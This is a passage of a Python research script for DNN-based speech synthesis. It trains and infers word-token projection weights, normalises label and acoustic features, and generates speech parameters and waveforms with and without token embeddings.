logger.debug('this partition: %d frames (divided into %d batches of size %d)' %(train_set_x.get_value(borrow=True).shape[0], n_train_batches, batch_size) )
for minibatch_index in range(n_train_batches):
this_train_error = train_word_fn(minibatch_index, current_finetune_lr, current_momentum)
train_error.append(this_train_error)
if numpy.isnan(this_train_error):
logger.warning('training error over minibatch %d of %d was %s' % (minibatch_index+1,n_train_batches,this_train_error) )
train_data_reader.reset()
### COULD REMOVE THIS LATER
## osw -- getting validation error from a forward pass in a single batch
## exhausts memory when using 20k projected vocab -- also use minibatches
logger.debug('calculating validation loss')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] // batch_size
for minibatch_index in range(n_valid_batches):
v_loss = valid_score_i(minibatch_index)
valid_error.append(v_loss)
this_validation_loss = numpy.mean(valid_error)
# this has a possible bias if the minibatches were not all of identical size
# but it should not be significant if the minibatches are small
this_train_valid_loss = numpy.mean(train_error)
# if plot:
# ## add dummy validation loss so that plot works:
# plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
# plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
#
sub_end_time = time.clock()
logger.info('TOKEN epoch %i, validation error %f, train error %f, time spent %.2f' %(epoch, this_validation_loss, this_train_valid_loss, (sub_end_time - sub_start_time)))
if cfg.hyper_params['model_type'] == 'TPDNN':
if not os.path.isdir(cfg.projection_weights_output_dir):
os.mkdir(cfg.projection_weights_output_dir)
weights = dnn_model.get_projection_weights()
fname = os.path.join(cfg.projection_weights_output_dir, 'proj_TOKEN_epoch_%s'%(epoch))
numpy.savetxt(fname, weights)
best_dnn_model = dnn_model ## always update
end_time = time.clock()
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
# if plot:
# plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
#
### ========================================================
### ========== now infer word representations for out-of-training (dev) data ============
#
# ### TEMP-- restarted!!! ### ~~~~~~~
# epoch = 50
# dnn_model = cPickle.load(open(nnets_file_name, 'rb'))
# train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
# dnn_model.build_finetune_functions(
# (train_set_x, train_set_x_proj, train_set_y),
# (valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
# this_train_valid_loss = 198.0 ## approx value
# ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def infer_projections(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False):
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
private_l2_reg = float(hyper_params['private_l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layers_sizes = hyper_params['hidden_layers_sizes']
stream_weights = hyper_params['stream_weights']
private_hidden_sizes = hyper_params['private_hidden_sizes']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
stream_lr_weights = hyper_params['stream_lr_weights']
use_private_hidden = hyper_params['use_private_hidden']
model_type = hyper_params['model_type']
index_to_project = hyper_params['index_to_project']
projection_insize = hyper_params['projection_insize']
projection_outsize = hyper_params['projection_outsize']
######### data providers ##########
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProviderWithProjectionIndex(x_file_list = train_x_file_list, y_file_list = train_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = True, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProviderWithProjectionIndex(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = False, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x, train_set_x_proj, train_set_y = shared_train_set_xy
shared_valid_set_xy, temp_valid_set_x, temp_valid_set_x_proj, temp_valid_set_y = valid_data_reader.load_next_partition_with_projection()
valid_set_x, valid_set_x_proj, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
####################################
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
############## load existing dnn #####
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
dnn_model.build_finetune_functions(
(train_set_x, train_set_x_proj, train_set_y),
(valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
####################################
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.clock()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
previous_finetune_lr = finetune_lr
logger.info('fine-tuning the %s model' %(model_type))
#dnn_model.initialise_projection_weights()
inference_epochs = 20 ## <-------- hard coded !!!!!!!!!!
current_finetune_lr = previous_finetune_lr = finetune_lr
warmup_epoch_3 = 10 # 10 ## <-------- hard coded !!!!!!!!!!
#warmup_epoch_3 = epoch + warmup_epoch_3
#inference_epochs += epoch
while (epoch < inference_epochs):
epoch = epoch + 1
current_momentum = momentum
if epoch > warmup_epoch_3:
previous_finetune_lr = current_finetune_lr
current_finetune_lr = previous_finetune_lr * 0.5
dev_error = []
sub_start_time = time.clock()
## osw -- inferring word reps on validation set in a forward pass in a single batch
## exhausts memory when using 20k projected vocab -- also use minibatches
logger.debug('infer word representations for validation set')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] // batch_size
for minibatch_index in range(n_valid_batches):
v_loss = infer_projections_fn(minibatch_index, current_finetune_lr, current_momentum)
valid_error.append(v_loss)
this_validation_loss = numpy.mean(valid_error)
#valid_error = infer_projections_fn(current_finetune_lr, current_momentum)
#this_validation_loss = numpy.mean(valid_error)
# if plot:
# ## add dummy validation loss so that plot works:
# plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
# plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
#
sub_end_time = time.clock()
logger.info('INFERENCE epoch %i, validation error %f, time spent %.2f' %(epoch, this_validation_loss, (sub_end_time - sub_start_time)))
if cfg.hyper_params['model_type'] == 'TPDNN':
if not os.path.isdir(cfg.projection_weights_output_dir):
os.mkdir(cfg.projection_weights_output_dir)
weights = dnn_model.get_projection_weights()
fname = os.path.join(cfg.projection_weights_output_dir, 'proj_INFERENCE_epoch_%s'%(epoch))
numpy.savetxt(fname, weights)
best_dnn_model = dnn_model ## always update
end_time = time.clock()
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
# if plot:
# plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
#
### ========================================================
if cfg.hyper_params['model_type'] == 'TPDNN':
os.system('python %s %s'%('/afs/inf.ed.ac.uk/user/o/owatts/scripts_NEW/plot_weights_multiple_phases.py', cfg.projection_weights_output_dir))
return best_validation_loss
def dnn_generation(valid_file_list, nnets_file_name, n_ins, n_outs, out_file_list, cfg=None, use_word_projections=True):
logger = logging.getLogger("dnn_generation")
logger.debug('Starting dnn_generation')
plotlogger = logging.getLogger("plotting")
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
## 'remove' word representations by randomising them. As the model is unpickled and
## not re-saved, this does not throw trained parameters away.
if not use_word_projections:
dnn_model.initialise_projection_weights()
# visualize_dnn(dbn)
file_number = len(valid_file_list)
for i in range(file_number):
logger.info('generating %4d of %4d: %s' % (i+1,file_number,valid_file_list[i]) )
fid_lab = open(valid_file_list[i], 'rb')
features = numpy.fromfile(fid_lab, dtype=numpy.float32)
fid_lab.close()
features = features[:(n_ins * (features.size // n_ins))]
features = features.reshape((-1, n_ins))
#features, features_proj = expand_projection_inputs(features, cfg.index_to_project, \
# cfg.projection_insize)
features, features_proj = get_unexpanded_projection_inputs(features, cfg.index_to_project, \
cfg.projection_insize)
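## split the input into real-valued features and the projection-index column
## (cfg.index_to_project); the indices appear to be kept unexpanded here and
## resolved by the projection layer at generation time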
#temp_set_x = features.tolist() ## osw - why list conversion necessary?
#print temp_set_x
test_set_x = theano.shared(numpy.asarray(features, dtype=theano.config.floatX))
test_set_x_proj = theano.shared(numpy.asarray(features_proj, dtype='int32'))
predicted_parameter = dnn_model.parameter_prediction(test_set_x=test_set_x, test_set_x_proj=test_set_x_proj)
# predicted_parameter = test_out()
### write to cmp file
predicted_parameter = numpy.array(predicted_parameter, 'float32')
temp_parameter = predicted_parameter
fid = open(out_file_list[i], 'wb')
predicted_parameter.tofile(fid)
logger.debug('saved to %s' % out_file_list[i])
fid.close()
## generate bottleneck layer activations as features
def dnn_hidden_generation(valid_file_list, nnets_file_name, n_ins, n_outs, out_file_list):
logger = logging.getLogger("dnn_generation")
logger.debug('Starting dnn_generation')
plotlogger = logging.getLogger("plotting")
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
file_number = len(valid_file_list)
for i in range(file_number):
logger.info('generating %4d of %4d: %s' % (i+1,file_number,valid_file_list[i]) )
fid_lab = open(valid_file_list[i], 'rb')
features = numpy.fromfile(fid_lab, dtype=numpy.float32)
fid_lab.close()
features = features[:(n_ins * (features.size // n_ins))]
features = features.reshape((-1, n_ins))
temp_set_x = features.tolist()
test_set_x = theano.shared(numpy.asarray(temp_set_x, dtype=theano.config.floatX))
predicted_parameter = dnn_model.generate_top_hidden_layer(test_set_x=test_set_x)
### write to cmp file
predicted_parameter = numpy.array(predicted_parameter, 'float32')
temp_parameter = predicted_parameter
fid = open(out_file_list[i], 'wb')
predicted_parameter.tofile(fid)
logger.debug('saved to %s' % out_file_list[i])
fid.close()
def main_function(cfg):
# get a logger for this main function
logger = logging.getLogger("main")
# get another logger to handle plotting duties
plotlogger = logging.getLogger("plotting")
# later, we might do this via a handler that is created, attached and configured
# using the standard config mechanism of the logging module
# but for now we need to do it manually
plotlogger.set_plot_path(cfg.plot_dir)
#### parameter setting########
hidden_layers_sizes = cfg.hyper_params['hidden_layers_sizes']
####prepare environment
try:
file_id_list = read_file_list(cfg.file_id_scp)
logger.debug('Loaded file id list from %s' % cfg.file_id_scp)
except IOError:
# this means that open(...) threw an error
logger.critical('Could not load file id list from %s' % cfg.file_id_scp)
raise
###total file number including training, development, and testing
total_file_number = len(file_id_list)
data_dir = cfg.data_dir
nn_cmp_dir = os.path.join(data_dir, 'nn' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))
nn_cmp_norm_dir = os.path.join(data_dir, 'nn_norm' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim))
model_dir = os.path.join(cfg.work_dir, 'nnets_model')
gen_dir = os.path.join(cfg.work_dir, 'gen')
in_file_list_dict = {}
for feature_name in list(cfg.in_dir_dict.keys()):
in_file_list_dict[feature_name] = prepare_file_path_list(file_id_list, cfg.in_dir_dict[feature_name], cfg.file_extension_dict[feature_name], False)
nn_cmp_file_list = prepare_file_path_list(file_id_list, nn_cmp_dir, cfg.cmp_ext)
nn_cmp_norm_file_list = prepare_file_path_list(file_id_list, nn_cmp_norm_dir, cfg.cmp_ext)
###normalisation information
norm_info_file = os.path.join(data_dir, 'norm_info' + cfg.combined_feature_name + '_' + str(cfg.cmp_dim) + '_' + cfg.output_feature_normalisation + '.dat')
### normalise input full context label
# currently supporting two different forms of linguistic features
# later, we should generalise this
if cfg.label_style == 'HTS':
label_normaliser = HTSLabelNormalisation(question_file_name=cfg.question_file_name)
lab_dim = label_normaliser.dimension
logger.info('Input label dimension is %d' % lab_dim)
suffix=str(lab_dim)
# no longer supported - use new "composed" style labels instead
elif cfg.label_style == 'composed':
# label_normaliser = XMLLabelNormalisation(xpath_file_name=cfg.xpath_file_name)
suffix='composed'
if cfg.process_labels_in_work_dir:
label_data_dir = cfg.work_dir
else:
label_data_dir = data_dir
# the dimension suffix in these directory names could be removed
binary_label_dir = os.path.join(label_data_dir, 'binary_label_'+suffix)
nn_label_dir = os.path.join(label_data_dir, 'nn_no_silence_lab_'+suffix)
nn_label_norm_dir = os.path.join(label_data_dir, 'nn_no_silence_lab_norm_'+suffix)
# nn_label_norm_mvn_dir = os.path.join(data_dir, 'nn_no_silence_lab_norm_'+suffix)
in_label_align_file_list = prepare_file_path_list(file_id_list, cfg.in_label_align_dir, cfg.lab_ext, False)
binary_label_file_list = prepare_file_path_list(file_id_list, binary_label_dir, cfg.lab_ext)
nn_label_file_list = prepare_file_path_list(file_id_list, nn_label_dir, cfg.lab_ext)
nn_label_norm_file_list = prepare_file_path_list(file_id_list, nn_label_norm_dir, cfg.lab_ext)
# to do - sanity check the label dimension here?
min_max_normaliser = None
label_norm_file = 'label_norm_%s.dat' %(cfg.label_style)
label_norm_file = os.path.join(label_data_dir, label_norm_file)
if cfg.NORMLAB and (cfg.label_style == 'HTS'):
# simple HTS labels
logger.info('preparing label data (input) using standard HTS style labels')
label_normaliser.perform_normalisation(in_label_align_file_list, binary_label_file_list)
remover = SilenceRemover(n_cmp = lab_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(binary_label_file_list, in_label_align_file_list, nn_label_file_list)
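## a sketch of the assumed linear min-max scheme: each feature x is mapped to
## x_norm = (x - x_min) / (x_max - x_min) * (0.99 - 0.01) + 0.01, i.e. into
## the range [0.01, 0.99] given by the parameters below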
min_max_normaliser = MinMaxNormalisation(feature_dimension = lab_dim, min_value = 0.01, max_value = 0.99)
###use only training data to find min-max information, then apply on the whole dataset
min_max_normaliser.find_min_max_values(nn_label_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_label_file_list, nn_label_norm_file_list)
if cfg.NORMLAB and (cfg.label_style == 'composed'):
# new flexible label preprocessor
logger.info('preparing label data (input) using "composed" style labels')
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
logger.info('Loaded label configuration')
# logger.info('%s' % label_composer.configuration.labels )
lab_dim=label_composer.compute_label_dimension()
logger.info('label dimension will be %d' % lab_dim)
if cfg.precompile_xpaths:
label_composer.precompile_xpaths()
# there are now several parallel sets of input label files (e.g., one set of HTS labels and another of Ossian trees)
# create all the lists of these, ready to pass to the label composer
in_label_align_file_list = {}
for label_style, label_style_required in label_composer.label_styles.items():
if label_style_required:
logger.info('labels of style %s are required - constructing file paths for them' % label_style)
if label_style == 'xpath':
in_label_align_file_list['xpath'] = prepare_file_path_list(file_id_list, cfg.xpath_label_align_dir, cfg.utt_ext, False)
elif label_style == 'hts':
in_label_align_file_list['hts'] = prepare_file_path_list(file_id_list, cfg.hts_label_align_dir, cfg.lab_ext, False)
else:
logger.critical('unsupported label style %s specified in label configuration' % label_style)
raise Exception
# now iterate through the files, one at a time, constructing the labels for them
num_files=len(file_id_list)
logger.info('the label styles required are %s' % label_composer.label_styles)
for i in range(num_files):
logger.info('making input label features for %4d of %4d' % (i+1,num_files))
# iterate through the required label styles and open each corresponding label file
# a dictionary of file descriptors, pointing at the required files
required_labels={}
for label_style, label_style_required in label_composer.label_styles.items():
# the files will be a parallel set of files for a single utterance
# e.g., the XML tree and an HTS label file
if label_style_required:
required_labels[label_style] = open(in_label_align_file_list[label_style][i] , 'r')
logger.debug(' opening label file %s' % in_label_align_file_list[label_style][i])
logger.debug('label styles with open files: %s' % required_labels)
label_composer.make_labels(required_labels,out_file_name=binary_label_file_list[i],fill_missing_values=cfg.fill_missing_values,iterate_over_frames=cfg.iterate_over_frames)
# now close all opened files
for fd in required_labels.values():
fd.close()
# silence removal
if cfg.remove_silence_using_binary_labels:
silence_feature = 0 ## use first feature in label -- hardcoded for now
logger.info('Silence removal from label using silence feature: %s'%(label_composer.configuration.labels[silence_feature]))
logger.info('Silence will be removed from CMP files in same way')
## Binary labels have 2 roles: both the thing trimmed and the instructions for trimming:
trim_silence(binary_label_file_list, nn_label_file_list, lab_dim, \
binary_label_file_list, lab_dim, silence_feature, percent_to_keep=5)
else:
logger.info('No silence removal done')
# start from the labels we have just produced, not trimmed versions
nn_label_file_list = binary_label_file_list
min_max_normaliser = MinMaxNormalisation(feature_dimension = lab_dim, min_value = 0.01, max_value = 0.99, exclude_columns=[cfg.index_to_project])
###use only training data to find min-max information, then apply on the whole dataset
min_max_normaliser.find_min_max_values(nn_label_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_label_file_list, nn_label_norm_file_list)
if min_max_normaliser != None:
### save label normalisation information for unseen testing labels
label_min_vector = min_max_normaliser.min_vector
label_max_vector = min_max_normaliser.max_vector
label_norm_info = numpy.concatenate((label_min_vector, label_max_vector), axis=0)
label_norm_info = numpy.array(label_norm_info, 'float32')
fid = open(label_norm_file, 'wb')
label_norm_info.tofile(fid)
fid.close()
logger.info('saved %s vectors to %s' %(label_min_vector.size, label_norm_file))
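## the file holds the min vector followed by the max vector, so unseen test
## labels can later be normalised with exactly the same ranges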
### make output acoustic data
if cfg.MAKECMP:
logger.info('creating acoustic (output) features')
delta_win = [-0.5, 0.0, 0.5]
acc_win = [1.0, -2.0, 1.0]
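## standard regression windows over a 3-frame context: delta_win approximates
## the first time-derivative of each feature and acc_win the second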
acoustic_worker = AcousticComposition(delta_win = delta_win, acc_win = acc_win)
acoustic_worker.prepare_nn_data(in_file_list_dict, nn_cmp_file_list, cfg.in_dimension_dict, cfg.out_dimension_dict)
if cfg.remove_silence_using_binary_labels:
## do this to get lab_dim:
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
silence_feature = 0 ## use first feature in label -- hardcoded for now
logger.info('Silence removal from CMP using binary label file')
## overwrite the untrimmed audio with the trimmed version:
trim_silence(nn_cmp_file_list, nn_cmp_file_list, cfg.cmp_dim, \
binary_label_file_list, lab_dim, silence_feature, percent_to_keep=5)
else: ## back off to previous method using HTS labels:
remover = SilenceRemover(n_cmp = cfg.cmp_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(nn_cmp_file_list, in_label_align_file_list, nn_cmp_file_list) # save to itself
### save acoustic normalisation information for normalising the features back
var_dir = os.path.join(data_dir, 'var')
if not os.path.exists(var_dir):
os.makedirs(var_dir)
var_file_dict = {}
for feature_name in list(cfg.out_dimension_dict.keys()):
var_file_dict[feature_name] = os.path.join(var_dir, feature_name + '_' + str(cfg.out_dimension_dict[feature_name]))
### normalise output acoustic data
if cfg.NORMCMP:
logger.info('normalising acoustic (output) features using method %s' % cfg.output_feature_normalisation)
cmp_norm_info = None
if cfg.output_feature_normalisation == 'MVN':
normaliser = MeanVarianceNorm(feature_dimension=cfg.cmp_dim)
###calculate mean and std vectors on the training data, and apply on the whole dataset
global_mean_vector = normaliser.compute_mean(nn_cmp_file_list[0:cfg.train_file_number], 0, cfg.cmp_dim)
global_std_vector = normaliser.compute_std(nn_cmp_file_list[0:cfg.train_file_number], global_mean_vector, 0, cfg.cmp_dim)
normaliser.feature_normalisation(nn_cmp_file_list, nn_cmp_norm_file_list)
cmp_norm_info = numpy.concatenate((global_mean_vector, global_std_vector), axis=0)
elif cfg.output_feature_normalisation == 'MINMAX':
min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim)
global_mean_vector = min_max_normaliser.compute_mean(nn_cmp_file_list[0:cfg.train_file_number])
global_std_vector = min_max_normaliser.compute_std(nn_cmp_file_list[0:cfg.train_file_number], global_mean_vector)
min_max_normaliser = MinMaxNormalisation(feature_dimension = cfg.cmp_dim, min_value = 0.01, max_value = 0.99)
min_max_normaliser.find_min_max_values(nn_cmp_file_list[0:cfg.train_file_number])
min_max_normaliser.normalise_data(nn_cmp_file_list, nn_cmp_norm_file_list)
cmp_min_vector = min_max_normaliser.min_vector
cmp_max_vector = min_max_normaliser.max_vector
cmp_norm_info = numpy.concatenate((cmp_min_vector, cmp_max_vector), axis=0)
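## as with the labels, the norm info is stacked into a single vector --
## [mean; std] for MVN or [min; max] for MINMAX -- before being written out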
else:
logger.critical('Normalisation type %s is not supported!\n' %(cfg.output_feature_normalisation))
raise Exception('Normalisation type %s is not supported!' %(cfg.output_feature_normalisation))
cmp_norm_info = numpy.array(cmp_norm_info, 'float32')
fid = open(norm_info_file, 'wb')
cmp_norm_info.tofile(fid)
fid.close()
logger.info('saved %s vectors to %s' %(cfg.output_feature_normalisation, norm_info_file))
# logger.debug(' value was\n%s' % cmp_norm_info)
feature_index = 0
for feature_name in list(cfg.out_dimension_dict.keys()):
feature_std_vector = numpy.array(global_std_vector[:,feature_index:feature_index+cfg.out_dimension_dict[feature_name]], 'float32')
fid = open(var_file_dict[feature_name], 'w')
feature_std_vector.tofile(fid)
fid.close()
logger.info('saved %s variance vector to %s' %(feature_name, var_file_dict[feature_name]))
# logger.debug(' value was\n%s' % feature_std_vector)
feature_index += cfg.out_dimension_dict[feature_name]
train_x_file_list = nn_label_norm_file_list[0:cfg.train_file_number]
train_y_file_list = nn_cmp_norm_file_list[0:cfg.train_file_number]
valid_x_file_list = nn_label_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
valid_y_file_list = nn_cmp_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
test_x_file_list = nn_label_norm_file_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
test_y_file_list = nn_cmp_norm_file_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
# we need to know the label dimension before training the DNN
# computing that requires us to look at the labels
#
# currently, there are two ways to do this
if cfg.label_style == 'HTS':
label_normaliser = HTSLabelNormalisation(question_file_name=cfg.question_file_name)
lab_dim = label_normaliser.dimension
elif cfg.label_style == 'composed':
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
logger.info('label dimension is %d' % lab_dim)
combined_model_arch = str(len(hidden_layers_sizes))
for hid_size in hidden_layers_sizes:
combined_model_arch += '_' + str(hid_size)
# nnets_file_name = '%s/%s_%s_%d.%d.%d.%d.%d.train.%d.model' \
# %(model_dir, cfg.model_type, cfg.combined_feature_name, int(cfg.multistream_switch),
# len(hidden_layers_sizes), hidden_layers_sizes[0],
# lab_dim, cfg.cmp_dim, cfg.train_file_number)
nnets_file_name = '%s/%s_%s_%d_%s_%d.%d.train.%d.model' \
%(model_dir, cfg.model_type, cfg.combined_feature_name, int(cfg.multistream_switch),
combined_model_arch, lab_dim, cfg.cmp_dim, cfg.train_file_number)
### DNN model training
if cfg.TRAINDNN:
logger.info('training DNN')
try:
os.makedirs(model_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# not an error - just means directory already exists
pass
else:
logger.critical('Failed to create model directory %s' % model_dir)
logger.critical(' OS error was: %s' % e.strerror)
raise
try:
if cfg.scheme == 'stagwise': ## sic -- 'stagwise' (not 'stagewise') is the expected config value
train_basic_DNN(train_xy_file_list = (train_x_file_list, train_y_file_list), \
valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
nnets_file_name = nnets_file_name, \
n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
train_DNN_with_projections(train_xy_file_list = (train_x_file_list, train_y_file_list), \
valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
nnets_file_name = nnets_file_name, \
n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
infer_projections(train_xy_file_list = (train_x_file_list, train_y_file_list), \
valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
nnets_file_name = nnets_file_name, \
n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
elif cfg.scheme == 'simultaneous':
train_DNN_and_traindev_projections(train_xy_file_list = (train_x_file_list, train_y_file_list), \
valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
nnets_file_name = nnets_file_name, \
n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
else:
sys.exit('unknown scheme!')
# train_DNN(train_xy_file_list = (train_x_file_list, train_y_file_list), \
# valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
# nnets_file_name = nnets_file_name, \
# n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
# hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
# infer_projections(train_xy_file_list = (train_x_file_list, train_y_file_list), \
# valid_xy_file_list = (valid_x_file_list, valid_y_file_list), \
# nnets_file_name = nnets_file_name, \
# n_ins = lab_dim, n_outs = cfg.cmp_dim, ms_outs = cfg.multistream_outs, \
# hyper_params = cfg.hyper_params, buffer_size = cfg.buffer_size, plot = cfg.plot)
except KeyboardInterrupt:
logger.critical('train_DNN interrupted via keyboard')
# Could 'raise' the exception further, but that causes a deep traceback to be printed
# which we don't care about for a keyboard interrupt. So, just bail out immediately
sys.exit(1)
except:
logger.critical('train_DNN threw an exception')
raise
### generate parameters from DNN (with random token reps and inferred ones -- NOTOKENS & TOKENS)
temp_dir_name_NOTOKENS = '%s_%s_%d_%d_%d_%d_%d_%d_NOTOKENS' \
%(cfg.model_type, cfg.combined_feature_name, int(cfg.do_post_filtering), \
cfg.train_file_number, lab_dim, cfg.cmp_dim, \
len(hidden_layers_sizes), hidden_layers_sizes[0])
gen_dir_NOTOKENS = os.path.join(gen_dir, temp_dir_name_NOTOKENS)
temp_dir_name_TOKENS = '%s_%s_%d_%d_%d_%d_%d_%d_TOKENS' \
%(cfg.model_type, cfg.combined_feature_name, int(cfg.do_post_filtering), \
cfg.train_file_number, lab_dim, cfg.cmp_dim, \
len(hidden_layers_sizes), hidden_layers_sizes[0])
gen_dir_TOKENS = os.path.join(gen_dir, temp_dir_name_TOKENS)
gen_file_id_list = file_id_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
test_x_file_list = nn_label_norm_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if cfg.DNNGEN:
logger.info('generating from DNN')
try:
os.makedirs(gen_dir)
except OSError as e:
if e.errno == errno.EEXIST:
# not an error - just means directory already exists
pass
else:
logger.critical('Failed to create generation directory %s' % gen_dir)
logger.critical(' OS error was: %s' % e.strerror)
raise
## Without word embeddings:
gen_file_list_NOTOKENS = prepare_file_path_list(gen_file_id_list, gen_dir_NOTOKENS, cfg.cmp_ext)
dnn_generation(test_x_file_list, nnets_file_name, lab_dim, cfg.cmp_dim, gen_file_list_NOTOKENS, cfg=cfg, use_word_projections=False)
## With word embeddings:
gen_file_list_TOKENS = prepare_file_path_list(gen_file_id_list, gen_dir_TOKENS, cfg.cmp_ext)
dnn_generation(test_x_file_list, nnets_file_name, lab_dim, cfg.cmp_dim, gen_file_list_TOKENS, cfg=cfg, use_word_projections=True)
logger.debug('denormalising generated output using method %s' % cfg.output_feature_normalisation)
for gen_file_list in [gen_file_list_NOTOKENS, gen_file_list_TOKENS]:
fid = open(norm_info_file, 'rb')
cmp_min_max = numpy.fromfile(fid, dtype=numpy.float32)
fid.close()
cmp_min_max = cmp_min_max.reshape((2, -1))
cmp_min_vector = cmp_min_max[0, ]
cmp_max_vector = cmp_min_max[1, ]
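## after reshape((2, -1)), row 0 is the min (or mean) vector and row 1 the
## max (or std) vector, matching the layout written during NORMCMP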
if cfg.output_feature_normalisation == 'MVN':
denormaliser = MeanVarianceNorm(feature_dimension = cfg.cmp_dim)
denormaliser.feature_denormalisation(gen_file_list, gen_file_list, cmp_min_vector, cmp_max_vector)
elif cfg.output_feature_normalisation == 'MINMAX':
denormaliser = MinMaxNormalisation(cfg.cmp_dim, min_value = 0.01, max_value = 0.99, min_vector = cmp_min_vector, max_vector = cmp_max_vector)
denormaliser.denormalise_data(gen_file_list, gen_file_list)
else:
logger.critical('denormalising method %s is not supported!\n' %(cfg.output_feature_normalisation))
raise Exception('denormalising method %s is not supported!' %(cfg.output_feature_normalisation))
## perform MLPG to smooth parameter trajectories
## if lf0 is included, the output features must have vuv.
generator = ParameterGeneration(gen_wav_features = cfg.gen_wav_features)
generator.acoustic_decomposition(gen_file_list, cfg.cmp_dim, cfg.out_dimension_dict, cfg.file_extension_dict, var_file_dict)
## osw: skip MLPG:
# split_cmp(gen_file_list, ['mgc', 'lf0', 'bap'], cfg.cmp_dim, cfg.out_dimension_dict, cfg.file_extension_dict)
### generate wav
if cfg.GENWAV:
logger.info('reconstructing waveform(s)')
for gen_dir in [gen_dir_NOTOKENS, gen_dir_TOKENS]:
generate_wav(gen_dir, gen_file_id_list, cfg) # generated speech
# generate_wav(nn_cmp_dir, gen_file_id_list) # reference copy synthesis speech
### evaluation: calculate distortion
if cfg.CALMCD:
logger.info('calculating MCD')
ref_data_dir = os.path.join(data_dir, 'ref_data')
ref_mgc_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.mgc_ext)
